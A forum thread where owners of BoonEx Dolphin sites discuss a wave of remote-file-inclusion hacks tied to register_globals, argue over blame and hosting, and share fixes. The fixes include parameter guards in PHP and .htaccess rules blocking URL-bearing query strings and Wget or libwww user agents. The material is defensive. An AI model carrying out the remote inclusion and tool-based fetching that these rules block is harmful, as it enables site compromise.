unoboonex
IMPORTANT. Security Alert!
13
Share:
Comments
| DosDawg(positive) | 55 days ago |
 |  | |
 | glad to see you guys post, wish it had come a little quicker. this is the same thing i have been saying since it started though. there are critics that just dont believe you when you say something. i am the first to say when i think something is the developers problem, but guys this was absolutely nothing to do with the scripts development, and i will stand behind you on this one. NOTE IXWEBHOSTING will not turn off their register_globals=on Bad HOST hostmonster has register_globals=on by default hfw has register_globals= on by default these are the three that i know about. register_globals an be disabled per account, and if you are unsure if they are on, you can check your phpinfo() to see. you should look at the master value as well as the local value. the local value can be tweaked with php_flags if your host allows php access to your htaccess. well enough about this. i have been dealing with this since wednesday. it appears to have slowed down. there are some sites that were affected that may still be up in the air, but other than that, i have not seen reports of other hacks. later, DosDawg |  |
 |  |  |
7 |
| sammie(positive) | 55 days ago |
| | |
| There are a few of us that have our own dedicated servers, and i dont mean cheap ones either, i know myself and DosDawd both pay over $230 a month for dedicated servers, and we are starting to offer other members hosting. this is ideal because you have your olphin sites hosted on a dedicated server that is in effect setup just for dolphin sites, because we use them for our own dolphin sites and make sure we keep them secure. maybe people need to understand that cheaper is just that, its cheap and setup for the masses, it causes your sites to be slow, you get dumped once you hog to much ram or cpu and bandwidth., i am moving all my sites over to dolphin, as i believe it is the most secure ECMS and most advanced ECMS out their, | |
| | |
3 |
View 3 replies to this comment
| Cleeto | 55 days ago |
| | |
| i use hostmonster ... haven't been hacked yet... i don't think.... but where would i look to change the setting of this? | |
| | |
1 |
View 2 replies to this comment
| atomikjon | 55 days ago |
| | |
| I got hit hard and they got into my VPS at hostforweb and screwed up all my PHP sites. unfortunately, I had to go to a 2 week old back up and lost 150 members and many edits! They came in through a test site running 6.1 and hot my other regular sites. | |
| | |
1 |
| atomikjon | 55 days ago |
| | |
| My host has it set off locally, but the master is on. So How did I get hacked? | |
| | |
1 |
View 1 replies to this comment
| bambie(negative) | 55 days ago |
| | |
| Well I have had professionals look at my site that has been hacked, And well they have informed me you have issues in your script this was the e-mail I received Hello, Whatever the script in /ray/ was, was exploitable and this is how the account was exploited and this malicious script uploaded. Regards, Richard F. Network Security Administrator Personally boonex is passing the issues on when it is there problem. | |
| | |
1 |
View 3 replies to this comment
| nurke | 55 days ago |
| | |
| how is this boonex`s problem/issue??? what dont you get? The script got in b/c hackers put it in...hackers put it in b/c your globals were on. Boonex cant control your servers hosting. Just do what you are told, and most importantly read/do every single step. use this issue to pick up those IP and block them form accessing your account... just my 2 cents... | |
| | |
1 |
| mscott(positive) | 55 days ago |
| | |
| DD are you sure? I'm almost positive HFW and Hostmonster both have them "off" by default? | |
| | |
1 |
| bambie(negative) | 55 days ago |
| | |
| My server is fine and follows boonex requirements, bonnex has holes in there script. Like i said a specialist looked into my site being hack and part of ray is exploitable. | |
| | |
1 |
View 1 replies to this comment
| theGhost | 55 days ago |
| | |
| Yes. They are definately exploiting the software and it's connection to all other communities. I took your "MUST" and NO DIFFERENCE regardless of RG is on or off in the Web2.0 enviro. So frustrated and irritated I began developing a list of "hack attacking servers" and the places they are coming from. Here is my list in the last 24 hours RIPE Network Coordination Centre (50+ instances) RackVibe LLC Internet Specialties West ISWEST-BLK-1 HostForWeb Inc. SCNET (20+ instances) Global Net Access (5+ instances) HostForWeb Inc. HOSTFORWEB-1 (20+ instances) Advanced Internet Technologies Value Eyecare Network, INC (20+ instances) Bluehost Inc ADDD2NET COM INC DBA LUNARPAGES Latin American and Caribbean IP address Regional Registry Covad Communications Co ThePlanet.com Internet Services, Inc HostDime.com, Inc.tw telecom holdings, inc (10+ instances) Asia Pacific Network Information Centre Although they are not INFECTING my Dolphin environments...They are punching the server at 3-5 min intervals revolving the attack off different Dolphins hosted throughout the NET. I'll keep playing withit and see if I can find a way to stop/block it. | |
| | |
2 |
View 3 replies to this comment
| avhow(positive) | 55 days ago |
| | |
| Hostmonster told me they are off. Maybe they are doing them server by server. Use their live chat to ask about your specific server if you are not sure. Your server name is available in cpanel. | |
| | |
1 |
| avhow | 55 days ago |
| | |
| Hi, Just a quicky - here if Hostforweb has globals on and Boonex recommend them as being perfect for Dolphin.... hmmm doesnt seem right somehow.... Cheers Max | |
| | |
1 |
| brenaris(negative) | 54 days ago |
| | |
| We were hacked as well, and yes, our register_globals was on. So, the problem was improper installation of Dolphin? Well, we paid Boonex to do our original Dolphin install!! Does this mean we can get our money back on that? It would hardly address the lost time we had fixing the problem, but it would be a start! -- Jason | |
| | |
0 |
| tango3d | 54 days ago |
| | |
| here is a snippet from my php.ini file I am using hostmonster, they recommend to copy this file to all directories and sub directories which contain php files. You should do your best to write your scripts so that they do not require ; register_globals to be on; Using form variables as globals can easily lead ; to possible security problems, if the code is not very well thought of. register_globals = Off | |
| | |
2 |
| houseperu(positive) | 54 days ago |
| | |
| Let me comment something I have a JOOMLA site www.guardiarepublicana.com/v02 Is hacked for someone how put a lot of links inside all files of the joomla Maybe you could thing that this is not for this topic, but let me tell you that The last week I installed a dolphin in the same site but with this URL: www.guardiarepublicana.com/v03 today the v03 is emty, because was hacked I goona give you some codes that this hacker put inside the files Maybe that gonna be important in order to solve the problem Sorry for my English | |
| | |
0 |
View 1 replies to this comment
| nurke | 54 days ago |
| | |
| mscott....when I inquired about globals with hostforweb...first they asked fpr ftp and server login info...then they said that I need to switch them off myself. I assume they were on. I got them off, deleted content.inc.php and uploaded one from dolphin script, same with safehtml ( I forgot the name of file now..) and since then I didnt get any warnings from HFW nor did I had any demages to the site.... I hope it stays that way. | |
| | |
0 |
| mmijangos | 54 days ago |
| | |
| I have last version SmartPro Pack 2.0.2 and my server have register global=off, but is reported as "attack-site" and has blocked for google, www.acting.com/index.php, I need help please. | |
| | |
0 |
View 1 replies to this comment
| Rob1960 | 54 days ago |
| | |
| My site was hacked, and for some reason my safehtml.php had permissions set to 777. I restored from backup, and changed settings to 766, and things are better. Could someone tell me the proper permission settings for the Plugins directory, the safehtml directory, and safehtml.php file? Also, is there a document listing the proper settings for all directories, or possibly a script to check my site for proper settings? | |
| | |
0 |
View 1 replies to this comment
| Rob1960 | 54 days ago |
| | |
| Thanks, I will check that out. But in ./inc, I had header.inc.php set to 666. I just changed that to 644. Is that correct? | |
| | |
0 |
View 1 replies to this comment
| clubk1d(positive) | 54 days ago |
| | |
| Maybe this could help you guys. . ., before doing this, try to put on your root directory a php.ini file with a code inside that will disable register_globals to off.. . then do this ff. steps. . http://www.boonex.com/unity/forums/topic/fix-for-dolphin-exploit.htm | |
| | |
0 |
View 1 replies to this comment
| sammie | 54 days ago |
| | |
| add the fllowing code to your ray/modules/global/inc/content.inc.php add it at the top above the 1st require once command if (isset($_REQUEST['sIncPath'])) die ('Hacking attempt'); so it looks like this : if (isset($_REQUEST['sIncPath'])) die ('Hacking attempt'); require_once($sIncPath . "xml.inc.php"); require_once($sIncPath . "constants.inc.php"); require_once($sIncPath . "apiFunctions.inc.php"); this stops any remote includes being used next edit /plugins/safehtml/HTMLSax3.php add this at the top above the require once if (isset($_REQUEST['dir'])) die ('Hacking attempt'); so it looks like this: if (isset($_REQUEST['dir'])) die ('Hacking attempt'); require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" ); require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" ); this stops remote access to your directories as my dedicated server is under constant attack from hackers trying to access the server via dolphin i paid them to look at the issue and this is what they have added to kill any remote access attempts i paid for it, you got it for free, enjoy and be safe. i have tested this on my working sites and there is no problem | |
| | |
4 |
View 2 replies to this comment
| DoLaugh | 54 days ago |
| | |
| Hey Sammie! Thanks so much, I added this code to the two files...do you have a solution for the tiny_mce? I keep getting files like this inserted in there also. Crap..I don't know...the C99 has probably opened up my entire site...I have no idea where all these backdoor trojans are at... Can I download my site and use my virus scan to find some of these? Any ideas are welcome. DoLaugh | |
| | |
1 |
| sammie | 54 days ago |
| | |
| the 1st code can apply to any file thats being exploited but test your site to make sure it does not affect its working and yes i downloaded a hacked VPS and used my virus scanner to see what was infected. it had 19 infections on the one dolphin site | |
| | |
1 |
View 1 replies to this comment
| theGhost(positive) | 54 days ago |
| | |
| Good Job sammie! Or... I was working on this all day and... I simply changed my name servers to a landing page...in this case a godaddy landing page. Waited 15 minutes and reset the name servers back to my own. Stop the attack cold. I broke the attack in mid stream and hasn't returned. Yea for me...That was annoying. I simply removed my url as a potential attacking site probally from their master attack script. The attack only affects BoonEx hosted sites as many other sites on this particular server were unaffected. Someone definately doesn't like Dolphin :( All of course monitor the situation over the next 48 hours to ensure no return. But for everyone else...Trying this will NOT affect your site and requires no script modifications for those who would rather not script write. Basically just hides your Dolphin in the Global Net for a few moments :) | |
| | |
1 |
View 2 replies to this comment
| gkcgautam | 53 days ago |
| | |
| Guys there are many other methods for hacking...even a completely secure script can be hacked... It happened with me few weeks ago that a trojan came into my computer...and somehow copied my ftp account details while i was working through ftp. Then it added some coded script to all pages with names index.xxx, home.xxx and default.xxx . The task of the script was to download malware softwares to those computers which opened my site. Changing the ftp password and removing that script solved the issue... But notice that it had copied my ftp details. So it could do anything with site files. So guys be updated about various hacks...and try to avoid them. | |
| | |
3 |
| VictorT | 53 days ago |
| | |
| We are about to release the Security patch. Everything is ready to go. But still waiting and looking at some details to be checked fully and unhurriedly. We would appreciate you patience. | |
| | |
1 |
View 2 replies to this comment
| theoneroom | 53 days ago |
| | |
| I added the above code suggested by Sammie in addition to some provided on expertzzz, for anyone, it goes it the root .htaccess file after the rewrite engine on statement, see below: RewriteCond %{QUERY_STRING} ^http [OR] RewriteCond %{QUERY_STRING} ^.+www\. [OR] RewriteCond %{QUERY_STRING} ^.+https [OR] RewriteCond %{QUERY_STRING} ^ftp RewriteRule .* - [L,F] RewriteCond %{HTTP_USER_AGENT} ^libwww [OR] RewriteCond %{HTTP_USER_AGENT} ^Wget RewriteRule .* - [F] | |
| | |
0 |
| avhow | 53 days ago |
| | |
| Hi, What I want to know is, if this register-globals off is such an inmportant prerequisite for a secure site why do Boonex recommend HostForWeb who say they have them turned on by default? Why Boonex are you recommending a hosting company that violates your hosting recommendations? Cheers Max | |
| | |
2 |
| DoLaugh | 53 days ago |
| | |
| When these Security patchs are released....where do you go to download the patch?....expertzzz site or here on unity? | |
| | |
0 |
| theoneroom | 53 days ago |
| | |
| avhow, thats a very good question that I would like answering myself, why are they recommending a hosting company that dont meet the requirements? | |
| | |
0 |
| chitro | 53 days ago |
| | |
| Victor, would this be a full patch to go from 6.0x to latest version? We have not yet upgraded our site and are planning to do so this week. |